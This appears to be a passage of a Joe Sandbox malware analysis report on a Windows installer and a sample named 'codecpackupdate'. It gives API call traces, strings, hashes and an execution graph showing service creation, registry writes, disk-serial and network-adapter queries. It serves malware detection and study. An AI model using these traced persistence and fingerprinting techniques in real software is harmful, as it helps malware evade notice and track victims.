                                                                            • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,00494420,00000000,00401A82,?,?,0040222E,021771FC,00001B1C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                            • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(00494420,00401A89,00000000,00401A82,?,?,0040222E,021771FC,00001B1C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                          • String ID: )
                                                                          • API String ID: 2227675388-1084416617
                                                                          • Opcode ID: a331b4afa8f9150ecfd6d625d08057cf3307c320ac16a2d40e23e2d78c6b5bf2
                                                                          • Instruction ID: cb504dffcee3235a55bc4261ddae651f31054f91a8da10d6123b862062c9523b
                                                                          • Opcode Fuzzy Hash: a331b4afa8f9150ecfd6d625d08057cf3307c320ac16a2d40e23e2d78c6b5bf2
                                                                          • Instruction Fuzzy Hash: A71101317042046FEB25AB799F1AB2A6AD4D7D575CB24087FF404F36D2D9BD8C02826C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00490A87
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window
                                                                          • String ID: /INITPROCWND=$%x $@
                                                                          • API String ID: 2353593579-4169826103
                                                                          • Opcode ID: cb4eaf9d1a0e90ba4be06c901a3c5ec9da01a08ec724fec4d2fbca150f0c6e2b
                                                                          • Instruction ID: 8fbfb881858f58605f6fc747a7b473234afd2d79c1019554ad0381eeacbb4dac
                                                                          • Opcode Fuzzy Hash: cb4eaf9d1a0e90ba4be06c901a3c5ec9da01a08ec724fec4d2fbca150f0c6e2b
                                                                          • Instruction Fuzzy Hash: 1611AF71A043099FDF05EBA4D841BAEBFF8EB59318F11447BE504E7281D63CAA05CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                          • SysFreeString.OLEAUT32(?), ref: 00446D5A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocByteCharFreeMultiWide
                                                                          • String ID: NIL Interface Exception$Unknown Method
                                                                          • API String ID: 3952431833-1023667238
                                                                          • Opcode ID: ee7019810a410abba18dc0100b1505424b4d32fb8a75e66193451ab1ec3a4339
                                                                          • Instruction ID: b72a7a67dd3218f0a3ff88df64177c3b524228aef2acc9d842c2d5e561a8356e
                                                                          • Opcode Fuzzy Hash: ee7019810a410abba18dc0100b1505424b4d32fb8a75e66193451ab1ec3a4339
                                                                          • Instruction Fuzzy Hash: 281196B0B042489FDB10DFA58D52AAEBBBCEB49704F51407AF500E7681D6799D04CA6A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00490388,?,0049037C,00000000,00490363), ref: 0049032E
                                                                          • CloseHandle.KERNEL32(004903C8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00490388,?,0049037C,00000000), ref: 00490345
                                                                            • Part of subcall function 00490218: GetLastError.KERNEL32(00000000,004902B0,?,?,?,?), ref: 0049023C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorHandleLastProcess
                                                                          • String ID: PI
                                                                          • API String ID: 3798668922-693334235
                                                                          • Opcode ID: 134415cf5764304d7a85ffb8c38d9270039f25a4b86aed9810cf5e7e1bec3561
                                                                          • Instruction ID: 4ee4de2afa315c5d3ad3dcaece3c94236d659781de1454245e5c0a060b0d81db
                                                                          • Opcode Fuzzy Hash: 134415cf5764304d7a85ffb8c38d9270039f25a4b86aed9810cf5e7e1bec3561
                                                                          • Instruction Fuzzy Hash: 380161B1604648AFDF10DBE1DC82E9FBBACEF48714F51007AB904E7291D6785E048A28
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DBB0
                                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DBF0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Value$EnumQuery
                                                                          • String ID: Inno Setup: No Icons
                                                                          • API String ID: 1576479698-2016326496
                                                                          • Opcode ID: 6a1cd3006789d3206220bad9523abcb9a55dd1f6e807552613f35ce7fa4689f1
                                                                          • Instruction ID: d0cbb6ba2be1033d78bdf391082c57df80f69eea6018bcbf63f776eb2494bfb3
                                                                          • Opcode Fuzzy Hash: 6a1cd3006789d3206220bad9523abcb9a55dd1f6e807552613f35ce7fa4689f1
                                                                          • Instruction Fuzzy Hash: 5A018431B8933069F73085266D41B6B558C9B46B64F65003BFA41AA3C0D6DCDC44E26A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00455055
                                                                          • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 004550E7
                                                                          Strings
                                                                          • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00455081
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)
                                                                          • API String ID: 3850602802-809544686
                                                                          • Opcode ID: 435dea47ab134ee9c233c790085fa77e26bfbdb6ab2bddbea41995d2dc1bd5d4
                                                                          • Instruction ID: 32b2d8f4ecb8be4c0db4edd04b2ba3825a47f3f95082eca841b8c31c2652d296
                                                                          • Opcode Fuzzy Hash: 435dea47ab134ee9c233c790085fa77e26bfbdb6ab2bddbea41995d2dc1bd5d4
                                                                          • Instruction Fuzzy Hash: DF11E5B12042805BD300AB6DDC92F6B7B989BD1708F05803AFA85DF2D2C3794805C7AA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00453D4C: GetCurrentProcess.KERNEL32(00000028), ref: 00453D5B
                                                                            • Part of subcall function 00453D4C: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00453D61
                                                                          • SetForegroundWindow.USER32(?), ref: 00491750
                                                                          Strings
                                                                          • Restarting Windows., xrefs: 0049172D
                                                                          • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 0049177B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                          • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                          • API String ID: 3179053593-4147564754
                                                                          • Opcode ID: 37e7ebe001a7a212cde58e6dd306762509c171bb9304b2fdbc30566b2ae3f974
                                                                          • Instruction ID: 8093b4a282ce56f34fca2c4e27c1e82005ec878bca3fe8f1f990b5ec0d5489bc
                                                                          • Opcode Fuzzy Hash: 37e7ebe001a7a212cde58e6dd306762509c171bb9304b2fdbc30566b2ae3f974
                                                                          • Instruction Fuzzy Hash: 9D0188746042866BEB01EBA5E451F9C2BF99754309F5040BBF400672E3DA7C994A871D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00406EB8: DeleteFileA.KERNEL32(00000000,00494628,00492509,00000000,0049255E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EC3
                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00470F4E
                                                                            • Part of subcall function 00470DA0: GetLastError.KERNEL32(00000000,00470E8C,?,?,?,00495090,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00470F13,00000001), ref: 00470DC1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: File$DeleteErrorLastMove
                                                                          • String ID: DeleteFile$MoveFile
                                                                          • API String ID: 3195829115-139070271
                                                                          • Opcode ID: db37762c13f4d93e70656b80c95a1045161ff295cb5d74cedc87cd46e1c3362d
                                                                          • Instruction ID: 5dbbe8a549c9c9cfc1e93233b16d66570ebc39fdbd933c087ed96991ed48964b
                                                                          • Opcode Fuzzy Hash: db37762c13f4d93e70656b80c95a1045161ff295cb5d74cedc87cd46e1c3362d
                                                                          • Instruction Fuzzy Hash: 3FF04FA0202200D6DA307A6AD5426DA77888F0135DB50C07BF988AB3C6CABD9C4586AE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetFocus.USER32(00000000,)I,00000000,004219E4,00000000,00000000,00418568,00000000,00000001,?,?,004618B2,00000001,00000000,00000000,00466C49), ref: 00421CBB
                                                                          • GetFocus.USER32 ref: 00421CC9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Focus
                                                                          • String ID: )I
                                                                          • API String ID: 2734777837-2943873603
                                                                          • Opcode ID: 0a10acb4e0d9c74637569f7b0a18baba00a92d22fcb4ca2a7c7c7526fd4ed3d2
                                                                          • Instruction ID: 6a781247274b35bf802f0d5c88fcb4425cf39f3bc7fec05fcedd95d7989a6849
                                                                          • Opcode Fuzzy Hash: 0a10acb4e0d9c74637569f7b0a18baba00a92d22fcb4ca2a7c7c7526fd4ed3d2
                                                                          • Instruction Fuzzy Hash: ADE09A35B002205ACB1027BA6886BAB21844B64348F58957FB501EB353DD7C8C80068C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(00000000,0049293A), ref: 0040334B
                                                                          • GetCommandLineA.KERNEL32(00000000,0049293A), ref: 00403356
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CommandHandleLineModule
                                                                          • String ID: H6c
                                                                          • API String ID: 2123368496-3698304253
                                                                          • Opcode ID: 016f57816537cb53ee0d22fead2d74d1c6c49dfd7bcaddc35502ccb39479f9fa
                                                                          • Instruction ID: 6c134d8f911d6f86227fe2926812c1aaae8294de158ab29e80a48ca6d96688b2
                                                                          • Opcode Fuzzy Hash: 016f57816537cb53ee0d22fead2d74d1c6c49dfd7bcaddc35502ccb39479f9fa
                                                                          • Instruction Fuzzy Hash: 00C002609052058AD750AFB5D856F152A949795349F80447FB204B61E1D67C82065BDD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastSleep
                                                                          • String ID:
                                                                          • API String ID: 1458359878-0
                                                                          • Opcode ID: 38b3aa0fdc7cf286ae7908819d82f9e16bc075767d4286dc2cbeeb2193c7130c
                                                                          • Instruction ID: 12fd24ff74408153868fcfa923be8ac64c8e349910a1f425c594e0bb2a7a610d
                                                                          • Opcode Fuzzy Hash: 38b3aa0fdc7cf286ae7908819d82f9e16bc075767d4286dc2cbeeb2193c7130c
                                                                          • Instruction Fuzzy Hash: 5CF02B32B04514974F30ADAE98C766FA2DCEA813E7710452BFD08D7303D538DE0986A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage: 7.4%
                                                                          Dynamic/Decrypted Code Coverage: 0%
                                                                          Signature Coverage: 4.7%
                                                                          Total number of Nodes: 448
                                                                          Total number of Limit Nodes: 13
                                                                          execution_graph 2736 402345 2737 4026a1 StartServiceCtrlDispatcherA 2736->2737 2738 40b5f9 2737->2738 2738->2738 2889 4028c6 2890 402e70 12 API calls 2889->2890 2891 4028cb 2890->2891 2892 402e70 12 API calls 2891->2892 2893 40b467 2892->2893 2893->2893 2809 402748 GetModuleFileNameW 2810 40ba83 2809->2810 2894 4021c9 2895 4021cf 2894->2895 2896 40b6b6 GetModuleHandleA GetModuleFileNameA 2895->2896 2811 40234b 2812 40b15c CreateFileA 2811->2812 2901 4025d6 SetEvent 2902 40babc 2901->2902 2762 4028db RegCloseKey 2763 40286b 2762->2763 2763->2762 2813 40235e 2814 4023b0 2813->2814 2815 402365 2813->2815 2815->2814 2816 402370 GetLastError SetServiceStatus SetEvent 2815->2816 2816->2814 2903 40b4de CreateDirectoryA 2817 40b660 2818 40b673 Sleep 2817->2818 2819 40b93b 2818->2819 2819->2819 2904 404ae0 2905 404ae8 2904->2905 2906 404b7a 2905->2906 2908 4049f0 RtlUnwind 2905->2908 2909 404a08 2908->2909 2909->2905 2820 402561 2822 402566 2820->2822 2821 4028db RegCloseKey 2821->2822 2822->2821 2910 4021e1 2911 4026c0 2910->2911 2912 40220b 2910->2912 2912->2910 2913 40b8d3 LoadLibraryExA 2912->2913 2914 40ba62 2912->2914 2913->2912 2915 4026e2 2916 40b8d3 LoadLibraryExA 2915->2916 2917 4021e1 2916->2917 2917->2916 2918 4026c0 2917->2918 2823 402667 2824 402664 2823->2824 2824->2823 2825 40b681 GetProcAddress 2824->2825 2919 405ce7 2920 405cf5 2919->2920 2921 405cf9 LCMapStringW 2920->2921 2924 405cad 2920->2924 2922 405d11 WideCharToMultiByte 2921->2922 2921->2924 2922->2924 2925 404ae8 2926 404b7a 2925->2926 2928 404b06 2925->2928 2927 4049f0 RtlUnwind 2927->2928 2928->2926 2928->2927 2740 40b3ea 2741 40b577 RegSetValueExA 2740->2741 2826 405e6b 2827 405e72 2826->2827 2828 405ea3 2827->2828 2829 405e7a MultiByteToWideChar 2827->2829 2829->2828 2830 405e93 GetStringTypeW 2829->2830 2830->2828 2932 4024ec 2933 40b5ed WaitForSingleObject 2932->2933 2935 40b6ec Sleep 2831 40b86d ExitProcess 2748 
40226e 2749 4022bb 2748->2749 2750 40227b 2748->2750 2751 40b414 lstrcmpiW 2750->2751 2752 402283 2750->2752 2751->2752 2752->2752 2936 40b2ef 2937 40b2f5 VirtualAlloc 2936->2937 2938 40b359 2936->2938 2937->2938 2938->2938 2832 402572 2833 40b000 CreateServiceA 2832->2833 2834 40b69a 2833->2834 2835 402776 GetModuleHandleA 2757 40417b 2758 404187 GetCurrentProcess TerminateProcess 2757->2758 2759 404198 2757->2759 2758->2759 2760 404212 2759->2760 2761 404202 ExitProcess 2759->2761 2802 40b4fc 2803 40b510 2802->2803 2804 40b4d3 CreateDirectoryA 2802->2804 2806 4028fd 2807 40b3c0 RegOpenKeyExA 2806->2807 2808 40b934 2807->2808 2939 4025fd wsprintfA 2940 402741 2939->2940 2836 40217e 2837 402863 GetModuleHandleA 2836->2837 2839 40bb7f 2840 40bba1 RegCloseKey 2839->2840 2841 40bba7 2840->2841 2941 402782 GetTickCount 2743 40b40c 2744 40b4d1 RegQueryValueExA 2743->2744 2745 40b92e 2744->2745 2746 40b822 RegCloseKey 2745->2746 2747 40b934 2745->2747 2746->2745 2942 40b38c CloseServiceHandle 2842 40300d 2849 40416a 2842->2849 2844 403018 2845 403026 2844->2845 2847 404bc0 7 API calls 2844->2847 2846 404bf9 7 API calls 2845->2846 2848 40302f 2846->2848 2847->2845 2850 40417b 3 API calls 2849->2850 2851 404177 2850->2851 2851->2844 2852 40b00d RegCreateKeyExA 2853 40b01b 2852->2853 2753 40b397 2754 40b398 CopyFileA 2753->2754 2756 402661 2754->2756 2756->2756 2421 402f22 GetVersion 2445 40325a HeapCreate 2421->2445 2423 402f81 2424 402f86 2423->2424 2425 402f8e 2423->2425 2520 40303d 2424->2520 2457 404842 2425->2457 2429 402f96 GetCommandLineA 2471 404710 2429->2471 2433 402fb0 2503 40440a 2433->2503 2435 402fb5 2436 402fba GetStartupInfoA 2435->2436 2516 4043b2 2436->2516 2438 402fcc GetModuleHandleA 2440 402ff0 2438->2440 2526 404159 2440->2526 2446 4032b0 2445->2446 2447 40327a 2445->2447 2446->2423 2533 403112 2447->2533 2450 403296 2452 4032b3 2450->2452 2547 403b08 2450->2547 2451 403289 2545 4032b7 HeapAlloc 2451->2545 2452->2423 2455 403293 2455->2452 2456 4032a4 
HeapDestroy 2455->2456 2456->2446 2610 402e70 2457->2610 2460 404861 GetStartupInfoA 2467 404972 2460->2467 2470 4048ad 2460->2470 2463 404999 GetStdHandle 2466 4049a7 GetFileType 2463->2466 2463->2467 2464 4049d9 SetHandleCount 2464->2429 2465 402e70 12 API calls 2465->2470 2466->2467 2467->2463 2467->2464 2468 40491e 2468->2467 2469 404940 GetFileType 2468->2469 2469->2468 2470->2465 2470->2467 2470->2468 2472 40472b GetEnvironmentStringsW 2471->2472 2473 40475e 2471->2473 2474 404733 2472->2474 2475 40473f GetEnvironmentStrings 2472->2475 2473->2474 2476 40474f 2473->2476 2478 404777 WideCharToMultiByte 2474->2478 2479 40476b GetEnvironmentStringsW 2474->2479 2475->2476 2477 402fa6 2475->2477 2476->2477 2480 4047f1 GetEnvironmentStrings 2476->2480 2481 4047fd 2476->2481 2494 4044c3 2477->2494 2483 4047ab 2478->2483 2484 4047dd FreeEnvironmentStringsW 2478->2484 2479->2477 2479->2478 2480->2477 2480->2481 2485 402e70 12 API calls 2481->2485 2486 402e70 12 API calls 2483->2486 2484->2477 2488 404818 2485->2488 2487 4047b1 2486->2487 2487->2484 2489 4047ba WideCharToMultiByte 2487->2489 2490 40482e FreeEnvironmentStringsA 2488->2490 2491 4047d4 2489->2491 2492 4047cb 2489->2492 2490->2477 2491->2484 2676 403061 2492->2676 2495 4044d5 2494->2495 2496 4044da GetModuleFileNameA 2494->2496 2706 40583b 2495->2706 2498 4044fd 2496->2498 2499 402e70 12 API calls 2498->2499 2500 40451e 2499->2500 2501 403018 7 API calls 2500->2501 2502 40452e 2500->2502 2501->2502 2502->2433 2504 404417 2503->2504 2506 40441c 2503->2506 2505 40583b 19 API calls 2504->2505 2505->2506 2507 402e70 12 API calls 2506->2507 2508 404449 2507->2508 2509 403018 7 API calls 2508->2509 2512 40445d 2508->2512 2509->2512 2510 403061 7 API calls 2511 4044ac 2510->2511 2511->2435 2513 4044a0 2512->2513 2514 402e70 12 API calls 2512->2514 2515 403018 7 API calls 2512->2515 2513->2510 2514->2512 2515->2512 2517 4043bb 2516->2517 2519 4043c0 2516->2519 2518 40583b 19 API calls 2517->2518 2518->2519 

Control-flow Graph (graph rendering omitted)
APIs
• LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
• GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
• GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
• FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
Memory Dump Source
• Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
Similarity
• API ID: Library$AdaptersAddressFreeInfoLoadProc
• String ID: GetAdaptersInfo$iphlpapi.dll$o
• API String ID: 514930453-3667123677
• Opcode ID: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
• Instruction ID: 989bf52404031a28807fba390b80e1364536d7dfce6c2044dfeb9dc774225594
• Opcode Fuzzy Hash: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
• Instruction Fuzzy Hash: F521B870944209AFEF21DF65C9447EF7BB8EF41344F1440BAE504B22E1E7789985CB69
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph rendering omitted; function entry 401a4f)
APIs
• CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
• DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
• GetLastError.KERNEL32 ref: 00401B0E
• FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
Memory Dump Source
• Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
Similarity
• API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
• String ID: \\.\PhysicalDrive0
• API String ID: 3786717961-1180397377
• Opcode ID: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
• Instruction ID: 4be7cd3f819721d39b4e681a90ac86abf8c5b8a7a35c169795375fcfafce56b7
• Opcode Fuzzy Hash: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
• Instruction Fuzzy Hash: 5E31AB71D00218EADB21EFA5CD809EFBBB8FF41750F20407AE514B22A0E3785E41CB98
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph rendering omitted; function entry 402345)
APIs
• StartServiceCtrlDispatcherA.ADVAPI32 ref: 004026A1
Memory Dump Source
• Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
Similarity
• API ID: CtrlDispatcherServiceStart
• String ID:
• API String ID: 3789849863-0
• Opcode ID: 6dc742ed42f21e6c69dac81c81aca4cf90024d9fc7185b2147acdb0c855cd8ac
• Instruction ID: 40a2f8b49cbd42c4c1ae9a929fb38234da1fb277cd8ec946056b9c6573f4ebba
• Opcode Fuzzy Hash: 6dc742ed42f21e6c69dac81c81aca4cf90024d9fc7185b2147acdb0c855cd8ac
• Instruction Fuzzy Hash: E1A011A020C20AEACA0002808A0C0B2A00CA30A32AB3008B3200FB00C282BC802238AF
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph rendering omitted)
APIs
• GetVersion.KERNEL32 ref: 00402F48
  • Part of subcall function 0040325A: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
  • Part of subcall function 0040325A: HeapDestroy.KERNEL32 ref: 004032AA
• GetCommandLineA.KERNEL32 ref: 00402F96
• GetStartupInfoA.KERNEL32(?), ref: 00402FC1
• GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402FE4
  • Part of subcall function 0040303D: ExitProcess.KERNEL32 ref: 0040305A
Memory Dump Source
• Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
Similarity
• API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
• String ID: h5`
